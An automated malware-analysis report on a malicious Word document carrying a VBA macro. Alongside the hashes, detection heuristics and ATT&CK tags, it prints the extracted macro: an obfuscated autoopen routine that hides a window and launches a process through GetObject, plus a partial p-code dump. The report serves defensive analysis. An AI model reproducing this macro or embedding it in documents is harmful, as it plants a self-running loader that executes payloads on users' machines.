Office (OLE) malware analysis — malicious · c026fa10b57b6ea2

MALICIOUS

Office (OLE)

144.2 KB Created: 2019-03-19 16:45:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 4bfbfb1257e3f3cb11de9a7ef7c8b63c SHA-1: c2eeff0428f98e4eab4d0c420bb6cde66d84aca5 SHA-256: c026fa10b57b6ea2ebd6d6efc4a04df4b1edf8b13ce1c660b615ad0a70a8a714

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes the GetObject function, a common technique for executing embedded or downloaded payloads. This indicates the document is designed to download and execute a second-stage malicious payload.

Heuristics 7

ClamAV: Doc.Malware.Drvb-6901569-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Drvb-6901569-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10503 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10503 bytes
SHA-256: `d8148376e3896c75d84a44c7eacb42c8d68f422accf53ae1ecb2cb7aa75d92ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iAAAUxAU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MDQAG_" Attribute VB_Base = "0{6A2F53B5-9796-4987-AFA1-C9468714A29A}{93C114CF-DDC9-4BDF-9D5C-225EE3E532C0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "ww_Ax_UU" Sub autoopen() On Error Resume Next If TZQGXAQ = YAUokA_G Then BkABXBA = 569984726 - ChrB(843076583 * Round(935502368) + iAAkDU - ChrB(D_BQUUAw)) / BAXXA1 / Rnd(469117493 / E14CA_A * SpBb / ChrW(50061209 * CBool(40066218) / 607781978 + CStr(oBA_Q1kk))) / 463721617 * Oct(TAAAxUwc) End If If PXcDDAAA = BBcAAB Then joZZBA = 154354401 - ChrB(471567218 * Round(31201927) + HQC_GDo - ChrB(JQ4oGQQ)) / TUDwUx / Rnd(486658445 / RAC4wBkx * SpBb / ChrW(626150991 * CBool(62483571) / 112118660 + CStr(Oo1AAAAB))) / 321450386 * Oct(SAAAAACc) End If Set VkCAoD = GetObject(MDQAG_.iXXQQZGA) If cAcADQ = zUwUAXA Then wA4wAUBA = 453134110 - ChrB(140329015 * Round(871179875) + kDXQXAU - ChrB(iAAoBQAA)) / HD_AAA / Rnd(410789545 / UAUwDBc * SpBb / ChrW(129918205 * CBool(186648157) / 638284754 + CStr(QXAAACAB))) / 773641774 * Oct(S4D1A_A) End If If jZAUAw = CDcBZ4D_ Then oZAwQQ = 856467553 - ChrB(496823596 * Round(490173833) + sAA1QBCx - ChrB(dGDoAkcc)) / p4GDkAAA / Rnd(792389568 / mAUX1XA * SpBb / ChrW(988484813 * CBool(39158236) / 120920582 + CStr(VwB_ABU))) / 870481188 * Oct(dAAAUXX) End If VkCAoD.ShowWindow = 64970 - 64970 If Xc_GAc = po1A4A Then AXAUAA = 251164414 - ChrB(651805126 * Round(712340283) + wZAxxAD - ChrB(MoABAU4A)) / FBABAG / Rnd(255677085 / hAACQU * SpBb / ChrW(856406598 * CBool(528235425) / 51027830 + CStr(oQxZAk))) / 938647101 * Oct(SXX__U) End If If DAAAQZ_ = ACA1A_ Then YACB4B = 629097278 - ChrB(712483311 * Round(804737756) + HAB4DAA - ChrB(jBAc_A4)) / qoAUA4A / Rnd(905399602 / DAAcAAQ * SpBb / ChrW(767340703 * CBool(187238390) / 336030284 + CStr(uUB_AACD))) / 302304842 * Oct(DcDAAXwC) End If If r4UAC_AZ = hDQXDAAU Then JoZQAwG = 169749046 - ChrB(837101191 * Round(180256317) + sACAD4Q - ChrB(kU4AABD)) / PAxAAck / Rnd(911574048 / poGAAAQD * SpBb / ChrW(226780371 * CBool(552201874) / 66690612 + CStr(cA_AoAo))) / 382562619 * Oct(Zo_DAA) End If GetObject(MDQAG_.w4ZAQG_).Create% sAQUcQAA + MDQAG_.rAAwU1 + IQXBXA_B + MDQAG_.HACUDUC + aQAcoA + MDQAG_.IAAAGQAX + S_kUG4X, DQADAXw, VkCAoD, JAxQxA If zAQxADBU = VQXZwAZ Then AAACADU = 566589316 - ChrB(426537712 * Round(756681998) + MA41X41A - ChrB(z1oDAUAB)) / zQAAAX / Rnd(789471137 / pkCkUX * SpBb / ChrW(342247120 * CBool(592197169) / 220856248 + CStr(KDxAQ4D))) / 383850561 * Oct(NBBkBUUQ) End If If vBADoA = EAxAQAA Then kAQDX1oo = 537583213 - ChrB(350008565 * Round(978413243) + lAQQA4 - ChrB(sc4UG1UU)) / ID4U_cQA / Rnd(259650783 / RAUxAQ * SpBb / ChrW(183434635 * CBool(712580351) / 5986436 + CStr(aoBXXcQx))) / 178995178 * Oct(UAAQADBc) End If End Sub ' Processing file: /opt/analyzer/scan_staging/2e5515e275f94cec8555a3dcca73d2ed.bin ' =============================================================================== ' Module streams: ' Macros/VBA/iAAAUxAU - 1106 bytes ' Macros/VBA/MDQAG_ - 1157 bytes ' Macros/VBA/ww_Ax_UU - 4742 bytes ' Line #0: ' FuncDefn (Sub ww_Ax_UU()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Ld autoopen ' Ld TZQGXAQ ' Eq ' IfBlock ' Line #3: ' LitDI4 0x46D6 0x21F9 ' LitDI4 0x53E7 0x3240 ' LitDI4 0xA220 0x37C2 ' ArgsLd Round 0x0001 ' Mul ' Ld BkABXBA ' Add ' Ld iAAkDU ' ArgsLd ChrB 0x0001 ' Sub ' ArgsLd ChrB 0x0001 ' Ld D_BQUUAw ' Div ' LitDI4 0x2A35 0x1BF6 ' Ld BAXXA1 ' Div ' Ld SpBb ' Mul ' LitDI4 0xDF99 0x02FB ' LitDI4 0x5CAA 0x0263 ' Coerce (Bool) ' Mul ' LitDI4 0x045A 0x243A ' Div ' Ld E14CA_A ' ... (truncated)

SHA-256: d8148376e3896c75d84a44c7eacb42c8d68f422accf53ae1ecb2cb7aa75d92ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iAAAUxAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MDQAG_"
Attribute VB_Base = "0{6A2F53B5-9796-4987-AFA1-C9468714A29A}{93C114CF-DDC9-4BDF-9D5C-225EE3E532C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ww_Ax_UU"
Sub autoopen()
On Error Resume Next
   If TZQGXAQ = YAUokA_G Then
BkABXBA = 569984726 - ChrB(843076583 * Round(935502368) + iAAkDU - ChrB(D_BQUUAw)) / BAXXA1 / Rnd(469117493 / E14CA_A * SpBb / ChrW(50061209 * CBool(40066218) / 607781978 + CStr(oBA_Q1kk))) / 463721617 * Oct(TAAAxUwc)
End If
   If PXcDDAAA = BBcAAB Then
joZZBA = 154354401 - ChrB(471567218 * Round(31201927) + HQC_GDo - ChrB(JQ4oGQQ)) / TUDwUx / Rnd(486658445 / RAC4wBkx * SpBb / ChrW(626150991 * CBool(62483571) / 112118660 + CStr(Oo1AAAAB))) / 321450386 * Oct(SAAAAACc)
End If
Set VkCAoD = GetObject(MDQAG_.iXXQQZGA)
   If cAcADQ = zUwUAXA Then
wA4wAUBA = 453134110 - ChrB(140329015 * Round(871179875) + kDXQXAU - ChrB(iAAoBQAA)) / HD_AAA / Rnd(410789545 / UAUwDBc * SpBb / ChrW(129918205 * CBool(186648157) / 638284754 + CStr(QXAAACAB))) / 773641774 * Oct(S4D1A_A)
End If
   If jZAUAw = CDcBZ4D_ Then
oZAwQQ = 856467553 - ChrB(496823596 * Round(490173833) + sAA1QBCx - ChrB(dGDoAkcc)) / p4GDkAAA / Rnd(792389568 / mAUX1XA * SpBb / ChrW(988484813 * CBool(39158236) / 120920582 + CStr(VwB_ABU))) / 870481188 * Oct(dAAAUXX)
End If
VkCAoD.ShowWindow = 64970 - 64970
   If Xc_GAc = po1A4A Then
AXAUAA = 251164414 - ChrB(651805126 * Round(712340283) + wZAxxAD - ChrB(MoABAU4A)) / FBABAG / Rnd(255677085 / hAACQU * SpBb / ChrW(856406598 * CBool(528235425) / 51027830 + CStr(oQxZAk))) / 938647101 * Oct(SXX__U)
End If
   If DAAAQZ_ = ACA1A_ Then
YACB4B = 629097278 - ChrB(712483311 * Round(804737756) + HAB4DAA - ChrB(jBAc_A4)) / qoAUA4A / Rnd(905399602 / DAAcAAQ * SpBb / ChrW(767340703 * CBool(187238390) / 336030284 + CStr(uUB_AACD))) / 302304842 * Oct(DcDAAXwC)
End If
   If r4UAC_AZ = hDQXDAAU Then
JoZQAwG = 169749046 - ChrB(837101191 * Round(180256317) + sACAD4Q - ChrB(kU4AABD)) / PAxAAck / Rnd(911574048 / poGAAAQD * SpBb / ChrW(226780371 * CBool(552201874) / 66690612 + CStr(cA_AoAo))) / 382562619 * Oct(Zo_DAA)
End If
GetObject(MDQAG_.w4ZAQG_).Create% sAQUcQAA + MDQAG_.rAAwU1 + IQXBXA_B + MDQAG_.HACUDUC + aQAcoA + MDQAG_.IAAAGQAX + S_kUG4X, DQADAXw, VkCAoD, JAxQxA
   If zAQxADBU = VQXZwAZ Then
AAACADU = 566589316 - ChrB(426537712 * Round(756681998) + MA41X41A - ChrB(z1oDAUAB)) / zQAAAX / Rnd(789471137 / pkCkUX * SpBb / ChrW(342247120 * CBool(592197169) / 220856248 + CStr(KDxAQ4D))) / 383850561 * Oct(NBBkBUUQ)
End If
   If vBADoA = EAxAQAA Then
kAQDX1oo = 537583213 - ChrB(350008565 * Round(978413243) + lAQQA4 - ChrB(sc4UG1UU)) / ID4U_cQA / Rnd(259650783 / RAUxAQ * SpBb / ChrW(183434635 * CBool(712580351) / 5986436 + CStr(aoBXXcQx))) / 178995178 * Oct(UAAQADBc)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/2e5515e275f94cec8555a3dcca73d2ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iAAAUxAU - 1106 bytes
' Macros/VBA/MDQAG_ - 1157 bytes
' Macros/VBA/ww_Ax_UU - 4742 bytes
' Line #0:
' 	FuncDefn (Sub ww_Ax_UU())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld TZQGXAQ 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0x46D6 0x21F9 
' 	LitDI4 0x53E7 0x3240 
' 	LitDI4 0xA220 0x37C2 
' 	ArgsLd Round 0x0001 
' 	Mul 
' 	Ld BkABXBA 
' 	Add 
' 	Ld iAAkDU 
' 	ArgsLd ChrB 0x0001 
' 	Sub 
' 	ArgsLd ChrB 0x0001 
' 	Ld D_BQUUAw 
' 	Div 
' 	LitDI4 0x2A35 0x1BF6 
' 	Ld BAXXA1 
' 	Div 
' 	Ld SpBb 
' 	Mul 
' 	LitDI4 0xDF99 0x02FB 
' 	LitDI4 0x5CAA 0x0263 
' 	Coerce (Bool) 
' 	Mul 
' 	LitDI4 0x045A 0x243A 
' 	Div 
' 	Ld E14CA_A 
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.